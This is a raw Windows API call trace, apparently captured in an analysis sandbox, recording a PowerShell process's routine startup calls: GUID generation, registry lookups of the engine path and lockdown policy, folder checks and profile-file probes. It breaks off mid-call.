[0197.053] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x12c8769f, Data2=0x636c, Data3=0x4a41, Data4=([0]=0xb5, [1]=0xfd, [2]=0x7a, [3]=0x2a, [4]=0x8b, [5]=0x6f, [6]=0x68, [7]=0x31))) returned 0x0 [0197.053] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x961dfcdf, Data2=0xcabc, Data3=0x4eef, Data4=([0]=0xbd, [1]=0x44, [2]=0x43, [3]=0x47, [4]=0xc6, [5]=0x8c, [6]=0xf6, [7]=0x1c))) returned 0x0 [0197.057] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x9f51bb32, Data2=0xb035, Data3=0x4788, Data4=([0]=0xa7, [1]=0xfc, [2]=0x20, [3]=0xf4, [4]=0xfa, [5]=0xce, [6]=0x6e, [7]=0x2f))) returned 0x0 [0197.057] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xf8668e4a, Data2=0x2550, Data3=0x4e2e, Data4=([0]=0x8e, [1]=0x33, [2]=0x91, [3]=0x1f, [4]=0xa5, [5]=0x55, [6]=0xde, [7]=0x33))) returned 0x0 [0197.871] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x7ffd26d6, Data2=0x3e24, Data3=0x4b6e, Data4=([0]=0xa1, [1]=0x78, [2]=0x3d, [3]=0x27, [4]=0x5d, [5]=0xbe, [6]=0x88, [7]=0x22))) returned 0x0 [0197.871] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xf3c6a3c5, Data2=0xab52, Data3=0x47fb, Data4=([0]=0x8c, [1]=0xd7, [2]=0x33, [3]=0x19, [4]=0xaf, [5]=0xf5, [6]=0x87, [7]=0x73))) returned 0x0 [0197.871] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x2d5f6e8, Data2=0xe15f, Data3=0x4494, Data4=([0]=0x9a, [1]=0xa3, [2]=0xe5, [3]=0xfd, [4]=0x12, [5]=0x5a, [6]=0x5b, [7]=0x9d))) returned 0x0 [0197.871] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xdd35c43c, Data2=0xd044, Data3=0x43c9, Data4=([0]=0xa3, [1]=0x54, [2]=0xb0, [3]=0x7b, [4]=0x7c, [5]=0xc7, [6]=0x70, [7]=0x83))) returned 0x0 [0197.871] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x935047ab, Data2=0xc52c, Data3=0x43bc, Data4=([0]=0xa7, [1]=0x60, [2]=0x43, [3]=0xc0, [4]=0x45, [5]=0x59, [6]=0x8e, [7]=0x3))) returned 0x0 [0197.871] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x8a25bec3, Data2=0xb343, Data3=0x4bff, Data4=([0]=0x82, [1]=0x5b, [2]=0x42, [3]=0xad, [4]=0x79, [5]=0x3a, [6]=0xcf, [7]=0x86))) returned 0x0 [0197.871] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x309296c2, Data2=0xfa3a, Data3=0x4533, Data4=([0]=0xbb, [1]=0x1f, [2]=0xa6, [3]=0x59, [4]=0x8, [5]=0x71, [6]=0x21, [7]=0x5b))) returned 0x0 [0197.890] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xdb60693b, Data2=0x1db, Data3=0x4cd5, Data4=([0]=0x8d, [1]=0x5d, [2]=0x32, [3]=0x73, [4]=0x1c, [5]=0x40, [6]=0xf6, [7]=0x8e))) returned 0x0 [0197.892] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x56f5a368, Data2=0x6ebf, Data3=0x4e6e, Data4=([0]=0xb0, [1]=0xe8, [2]=0xce, [3]=0x81, [4]=0xcd, [5]=0x4c, [6]=0xbb, [7]=0x9))) returned 0x0 [0197.892] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x5ecf563c, Data2=0xc487, Data3=0x4a61, Data4=([0]=0xab, [1]=0x35, [2]=0x79, [3]=0x47, [4]=0x1, [5]=0x71, [6]=0x5f, [7]=0x56))) returned 0x0 [0197.892] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xa0bfdeb6, Data2=0x8dd4, Data3=0x4155, Data4=([0]=0xb0, [1]=0xee, [2]=0xc0, [3]=0x4d, [4]=0xcf, [5]=0x14, [6]=0x83, [7]=0x45))) returned 0x0 [0197.892] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x5abb6003, Data2=0x97ba, Data3=0x4f69, Data4=([0]=0xbb, [1]=0x2f, [2]=0x11, [3]=0x8b, [4]=0x25, [5]=0xf5, [6]=0xf, [7]=0xab))) returned 0x0 [0197.892] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xe9d62323, Data2=0xc327, Data3=0x482b, Data4=([0]=0xa3, [1]=0x6e, [2]=0xa8, [3]=0x55, [4]=0xbe, [5]=0x4, [6]=0x2b, [7]=0xb))) returned 0x0 [0197.892] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x6ae60174, Data2=0x13e4, Data3=0x4ce6, Data4=([0]=0x8f, [1]=0xde, [2]=0xd4, [3]=0x81, [4]=0xa, [5]=0xbd, [6]=0xc6, [7]=0x83))) returned 0x0 [0197.892] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xfa7757a6, Data2=0xae33, Data3=0x48d7, Data4=([0]=0xb4, [1]=0x7d, [2]=0xac, [3]=0xcf, [4]=0xe4, [5]=0x44, [6]=0x2b, [7]=0xa1))) returned 0x0 [0197.892] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x8f486ad3, Data2=0xed94, Data3=0x44c1, Data4=([0]=0xb1, [1]=0x30, [2]=0x32, [3]=0x40, [4]=0x2, [5]=0x7f, [6]=0x46, [7]=0x80))) returned 0x0 [0197.893] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x6746a7a7, Data2=0x50e4, Data3=0x49b4, Data4=([0]=0x8a, [1]=0x4, [2]=0x32, [3]=0x86, [4]=0x8b, [5]=0xae, [6]=0x1, [7]=0x7c))) returned 0x0 [0197.893] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x4669a546, Data2=0x61a4, Data3=0x44bb, Data4=([0]=0xb4, [1]=0x3c, [2]=0x5f, [3]=0xc1, [4]=0xe8, [5]=0xcd, [6]=0xc, [7]=0x34))) returned 0x0 [0197.897] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x9b63ef08, Data2=0xeea3, Data3=0x426f, Data4=([0]=0x94, [1]=0xe2, [2]=0xc6, [3]=0xdb, [4]=0x7e, [5]=0x6a, [6]=0x23, [7]=0x15))) returned 0x0 [0197.899] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x6cee2694, Data2=0xf033, Data3=0x49fd, Data4=([0]=0xa0, [1]=0x7d, [2]=0xf8, [3]=0x9d, [4]=0xf3, [5]=0xde, [6]=0x95, [7]=0x6a))) returned 0x0 [0197.900] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdadf08 | out: phkResult=0xdadf08*=0x7d0) returned 0x0 [0197.901] RegQueryValueExW (in: hKey=0x7d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdadf28, lpData=0x0, lpcbData=0xdadf24*=0x0 | out: lpType=0xdadf28*=0x1, lpData=0x0, lpcbData=0xdadf24*=0x56) returned 0x0 [0197.901] RegQueryValueExW (in: hKey=0x7d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdadf28, lpData=0x56ea4e0, lpcbData=0xdadf24*=0x56 | out: lpType=0xdadf28*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdadf24*=0x56) returned 0x0 [0197.901] RegCloseKey (hKey=0x7d0) returned 0x0 [0197.902] CoCreateGuid (in: pguid=0xdadeb0 | out: pguid=0xdadeb0*(Data1=0xa7ae4b56, Data2=0xbbb4, Data3=0x48f2, Data4=([0]=0x9c, [1]=0xa6, [2]=0x5d, [3]=0x6b, [4]=0x69, [5]=0xd1, [6]=0x38, [7]=0x93))) returned 0x0 [0197.902] CoCreateGuid (in: pguid=0xdadeb0 | out: pguid=0xdadeb0*(Data1=0x69c71e5a, Data2=0xc7bf, Data3=0x441c, Data4=([0]=0x81, [1]=0x19, [2]=0x18, [3]=0x8d, [4]=0x71, [5]=0x23, [6]=0xc2, [7]=0x93))) returned 0x0 [0197.902] CoCreateGuid (in: pguid=0xdadeb0 | out: pguid=0xdadeb0*(Data1=0xef641f4f, Data2=0xc6cd, Data3=0x4aeb, Data4=([0]=0x87, [1]=0xac, [2]=0xc, [3]=0x35, [4]=0xf5, [5]=0xb5, [6]=0x3b, [7]=0xa7))) returned 0x0 [0197.902] CoCreateGuid (in: pguid=0xdadeb0 | out: pguid=0xdadeb0*(Data1=0xc12e22ff, Data2=0x445, Data3=0x4b67, Data4=([0]=0x97, [1]=0x79, [2]=0x94, [3]=0x23, [4]=0xb0, [5]=0x9b, [6]=0x56, [7]=0x77))) returned 0x0 [0197.902] CoCreateGuid (in: pguid=0xdadeb0 | out: pguid=0xdadeb0*(Data1=0x5f8639bc, Data2=0xd0e, Data3=0x4c1d, Data4=([0]=0xb2, [1]=0xcb, [2]=0x96, [3]=0xe6, [4]=0x27, [5]=0xa8, [6]=0x2c, [7]=0x6))) returned 0x0 [0197.902] CoCreateGuid (in: pguid=0xdadeb0 | out: pguid=0xdadeb0*(Data1=0xd5f2a8fc, Data2=0x3708, Data3=0x4aeb, Data4=([0]=0x88, [1]=0xb9, [2]=0x4f, [3]=0x38, [4]=0x91, [5]=0x40, [6]=0x4d, [7]=0x8d))) returned 0x0 [0197.969] GetLogicalDrives () returned 0x4 [0197.969] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0197.969] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0197.969] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0197.969] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0197.969] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.969] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x323c478 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0197.973] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0197.974] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0197.974] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0197.975] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0197.975] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0197.975] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9 [0197.975] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x9, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0197.975] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0197.975] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0197.975] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0197.976] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0197.976] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0197.976] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0197.976] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0197.976] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0197.979] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0197.983] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x57118a4*="Available", lpRawData=0x57117cc) returned 1 [0197.985] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0197.985] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x31fd1b0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0197.985] CoTaskMemFree (pv=0x31fd1b0) [0197.985] GetCurrentProcessId () returned 0x1064 [0197.985] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae660 | out: phkResult=0xdae660*=0x7d0) returned 0x0 [0197.986] RegQueryValueExW (in: hKey=0x7d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae680, lpData=0x0, lpcbData=0xdae67c*=0x0 | out: lpType=0xdae680*=0x1, lpData=0x0, lpcbData=0xdae67c*=0x56) returned 0x0 [0197.986] RegQueryValueExW (in: hKey=0x7d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae680, lpData=0x5717984, lpcbData=0xdae67c*=0x56 | out: lpType=0xdae680*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdae67c*=0x56) returned 0x0 [0197.986] RegCloseKey (hKey=0x7d0) returned 0x0 [0197.991] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x323c478 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0197.992] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0197.993] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0197.993] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0197.994] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0197.994] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0197.994] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9 [0197.994] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x9, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0197.994] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0197.994] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0197.994] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0197.994] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0197.994] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0197.995] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0197.995] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0197.995] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0197.998] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0198.665] GetStdHandle (nStdHandle=0xfffffff4) returned 0x1a0 [0198.665] WriteFile (in: hFile=0x1a0, lpBuffer=0xdae7b8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0xdae7bc, lpOverlapped=0x0 | out: lpBuffer=0xdae7b8*, lpNumberOfBytesWritten=0xdae7bc*=0x0, lpOverlapped=0x0) returned 1 [0198.717] GetFileType (hFile=0x1a0) returned 0x3 [0198.805] WriteFile (in: hFile=0x1a0, lpBuffer=0x57329a0*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0xdae798, lpOverlapped=0x0 | out: lpBuffer=0x57329a0*, lpNumberOfBytesWritten=0xdae798*=0x48, lpOverlapped=0x0) returned 1 [0198.805] EtwEventWriteTransfer (RegHandle=0x31da328, EventDescriptor=0x2e, ActivityId=0xdae840, RelatedActivityId=0xdae7e0, UserDataCount=0x0, UserData=0x0) returned 0x0 [0198.806] GetCurrentProcessId () returned 0x1064 [0198.806] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1064) returned 0x7d4 [0198.806] GetProcessTimes (in: hProcess=0x7d4, lpCreationTime=0x57348fc, lpExitTime=0x5734904, lpKernelTime=0x573490c, lpUserTime=0x5734914 | out: lpCreationTime=0x57348fc, lpExitTime=0x5734904, lpKernelTime=0x573490c, lpUserTime=0x5734914) returned 1 [0198.807] CloseHandle (hObject=0x7d4) returned 1 [0198.812] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0198.812] GetSystemDirectoryW (in: lpBuffer=0x31fd1b0, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0198.812] CoTaskMemFree (pv=0x31fd1b0) [0198.813] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0198.813] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0198.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdae628) returned 1 [0198.813] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xdae6a4 | out: lpFileInformation=0xdae6a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0198.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdae624) returned 1 [0198.813] GetSystemInfo (in: lpSystemInfo=0xdae6d8 | out: lpSystemInfo=0xdae6d8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0198.814] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae668 | out: phkResult=0xdae668*=0x7d4) returned 0x0 [0198.815] RegQueryValueExW (in: hKey=0x7d4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xdae684, lpData=0x0, lpcbData=0xdae680*=0x0 | out: lpType=0xdae684*=0x0, lpData=0x0, lpcbData=0xdae680*=0x0) returned 0x2 [0198.816] RegCloseKey (hKey=0x7d4) returned 0x0 [0198.819] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae6b4 | out: phkResult=0xdae6b4*=0x7d4) returned 0x0 [0198.820] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae6d4, lpData=0x0, lpcbData=0xdae6d0*=0x0 | out: lpType=0xdae6d4*=0x1, lpData=0x0, lpcbData=0xdae6d0*=0x56) returned 0x0 [0198.820] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae6d4, lpData=0x5735580, lpcbData=0xdae6d0*=0x56 | out: lpType=0xdae6d4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdae6d0*=0x56) returned 0x0 [0198.821] RegCloseKey (hKey=0x7d4) returned 0x0 [0198.821] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae6b4 | out: phkResult=0xdae6b4*=0x7d4) returned 0x0 [0198.822] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae6d4, lpData=0x0, lpcbData=0xdae6d0*=0x0 | out: lpType=0xdae6d4*=0x1, lpData=0x0, lpcbData=0xdae6d0*=0x56) returned 0x0 [0198.822] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae6d4, lpData=0x57358f8, lpcbData=0xdae6d0*=0x56 | out: lpType=0xdae6d4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdae6d0*=0x56) returned 0x0 [0198.822] RegCloseKey (hKey=0x7d4) returned 0x0 [0198.837] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0198.837] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x31fd1b0 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0198.838] CoTaskMemFree (pv=0x31fd1b0) [0198.838] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0198.838] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0198.838] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0198.838] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x31fd1b0 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0198.838] CoTaskMemFree (pv=0x31fd1b0) [0198.838] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0198.838] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0198.876] QueryPerformanceCounter (in: lpPerformanceCount=0xdae774 | out: lpPerformanceCount=0xdae774*=29391174582) returned 1 [0198.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0198.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x37, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0198.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdae684) returned 1 [0198.878] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xdae700 | out: lpFileInformation=0xdae700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0198.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdae680) returned 1 [0198.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0198.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x4c, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0198.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdae684) returned 1 [0198.879] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xdae700 | out: lpFileInformation=0xdae700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0198.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdae680) returned 1 [0198.879] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0198.879] GetFullPathNameW (in: 